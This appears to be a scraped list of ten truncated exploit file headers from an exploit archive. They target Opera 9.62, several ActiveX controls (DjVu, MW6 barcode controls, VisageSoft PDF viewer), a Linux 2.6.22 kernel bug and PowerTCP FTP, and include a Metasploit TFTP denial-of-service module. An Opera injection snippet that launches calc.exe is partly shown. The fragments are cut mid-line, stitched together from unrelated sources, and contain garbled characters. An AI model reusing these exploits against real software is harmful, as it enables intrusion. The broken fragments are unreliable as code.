!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com -- html script function execcalc() { var abc=c:\\windows\\system32\\calc.exe; window.open('opera:config?q=q=%2Aimg src='x' onerror=
!-- DjVu ActiveX Control ImageURL Property Overflow From DjVu.org : DjVu (pronounced dj vu) is a digital document format with advanced compression technology and high performance value. DjVu allows for the distribution on the Internet and on DVD of v
锘?lt;!--By Dr.PantagonDeltaSecurityCenterwww.DeltaSecurity.irDescription : Aztec ActiveXver : 3.0.0.1CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/aztec/MW6Aztec.ZIP This was written for educational purpose. Use it at yo
锘?lt;!--By Dr.PantagonDeltaSecurityCenterwww.DeltaSecurity.irDescription : 1D Barcode ActiveXver : 3.0.0.1CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/barcode/try/MW6Barcode.zip This was written for educational purpose.
锘?lt;!--By Dr.PantagonDeltaSecurityCenterwww.DeltaSecurity.irDescription : DataMatrix ActiveXver : 3.0.0.1CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/datamatrix/try/MW6DataMatrix.zip This was written for educational pu
锘?lt;!--By Dr.PantagonDeltaSecurityCenterwww.DeltaSecurity.irDescription : PDF417 ActiveXver : 3.0.0.1CopyRight : MW6 Technologies, Inc. Download Link :http://www.mw6tech.com/pdf417/try/MW6PDF417.zip This was written for educational purpose. Use it
VISAGESOFT eXPertPDFViewerX (VSPDFViewerX.ocx) INSECURE METHOD SITE: http://www.visagesoft.com This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Author: Marco Torti mail: marcotorti2[at
/* gw-ftrex.c: Linux kernel 2.6.22 open/ftruncate local exploit by gat3way at gat3way dot eu bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to
!-- PowerTCP FTP module Multiple Technique Exploit ( SEH Overwrite + HeapSpray ) bug originally found by : Intel (http://www.milw0rm.com/exploits/6793) I use Intel's exploit , but IE change unASCII bytes and it doesn't work! ( my system is XP SP2 IE7
require 'msf/core' class Metasploit3 Msf::Auxiliary include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' = 'PumpKIN TFTP Server DoS', 'Description' = %q{ PumpKIN TFTP Server 2.7.2.0 eventually reaches a DoS condi